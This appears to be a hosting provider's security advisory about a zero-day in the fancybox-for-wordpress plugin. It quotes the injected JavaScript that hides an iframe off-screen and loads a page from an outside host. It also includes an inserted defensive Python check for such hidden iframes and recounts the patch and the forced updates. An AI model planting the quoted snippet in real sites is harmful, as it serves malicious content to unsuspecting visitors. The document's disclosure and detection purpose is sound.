On the WordPress community support forum, members reported that the malicious code below is being injected into their (compromised) sites:
document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/
With the help of Konstantin Kovshenin and Gennady Kovshenin, the community analyzed the sites reported to be affected and identified the ‘culprit’ as a vulnerability in the fancybox-for-wordpress plugin.
With the source of the vulnerability identified and confirmed, the fancybox-for-wordpress plugin was temporarily removed from the WordPress Plugins Directory.
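A defender's check for the injection pattern shown above (an iframe inside an off-screen, absolutely positioned div, optionally emitted through document.write), as an added example that is not part of the original post or of any Pressidium tooling. The function name, the 500px threshold and the sample strings with placeholder.invalid hosts are assumptions constructed for illustration.

```python
import re

# A <div> with an inline style attribute, captured with its inner markup.
DIV_RE = re.compile(
    r"<div\b[^>]*\bstyle\s*=\s*(['\"])(?P<style>.*?)\1[^>]*>(?P<body>.*?)</div>",
    re.IGNORECASE | re.DOTALL,
)
# Large negative left/top offsets push the container outside the viewport.
OFFSET_RE = re.compile(r"\b(?:left|top):-(\d+)px")
IFRAME_SRC_RE = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?(?P<src>[^'\"\s>]+)", re.IGNORECASE
)

def find_hidden_iframes(text, min_offset=500):
    """Return iframes inside an off-screen div (min_offset is an assumed threshold)."""
    # Undo JavaScript string escaping so document.write("...\"...") also parses.
    text = text.replace('\\"', '"').replace("\\'", "'")
    findings = []
    for div in DIV_RE.finditer(text):
        style = re.sub(r"\s+", "", div.group("style")).lower()
        if "position:absolute" not in style and "position:fixed" not in style:
            continue
        offsets = [int(px) for px in OFFSET_RE.findall(style)]
        if not offsets or max(offsets) < min_offset:
            continue
        # Was the markup emitted by script rather than present in the template?
        via_script = "document.write" in text[max(0, div.start() - 200):div.start()]
        for frame in IFRAME_SRC_RE.finditer(div.group("body")):
            hit = {"src": frame.group("src"), "offset_px": max(offsets)}
            hit["via_script"] = via_script
            findings.append(hit)
    return findings

# Constructed samples: same shape as the injected snippet, placeholder hosts.
SAMPLE_INJECTED = (
    "document.write(' <div style=\"position:absolute;left:-2000px;width:2000px\">"
    "<iframe src=\"http://placeholder.invalid/frame.php\" width=\"20\" height=\"30\" >"
    "</iframe></div>');"
)
SAMPLE_BENIGN = (
    '<div style="position:relative;padding-bottom:56%">'
    '<iframe src="https://video.placeholder.invalid/embed/1"></iframe></div>'
    '<div style="position:absolute;left:-9999px">Skip to content</div>'
)

if __name__ == "__main__":
    for name, sample in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        print(name, find_hidden_iframes(sample))
```

Run it over rendered page output, theme files or exported option values; a hit is a lead for manual review, since legitimate themes occasionally position elements off-screen.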
Are websites hosted on Pressidium vulnerable? NO
After receiving word of the new vulnerability, along with the possibility of this new and very serious zero-day attack vector, our team immediately began investigating by running an initial analysis on the plugin. We confirmed that the plugin’s vulnerability allows an attacker to insert malware (script or any content) into the vulnerable website.
We then immediately disabled the plugin on all customer websites which were found to be vulnerable. Shortly after, the fancybox-for-wordpress plugin author, Jose Pardilla, informed the community in a forum post that a patch which resolves the vulnerability is now available (v3.0.3).
We’ve notified all users using the plugin and have force-updated every vulnerable site hosted on Pressidium. The plugin has now been re-enabled for all previously affected users.
At Pressidium, we take security very seriously, and we swiftly took all of the above actions in order to protect our customers from this very serious zero-day vulnerability. Should you have any concerns or need any more information about security provided by the Pressidium® Pinnacle Platform, please do not hesitate to contact our support.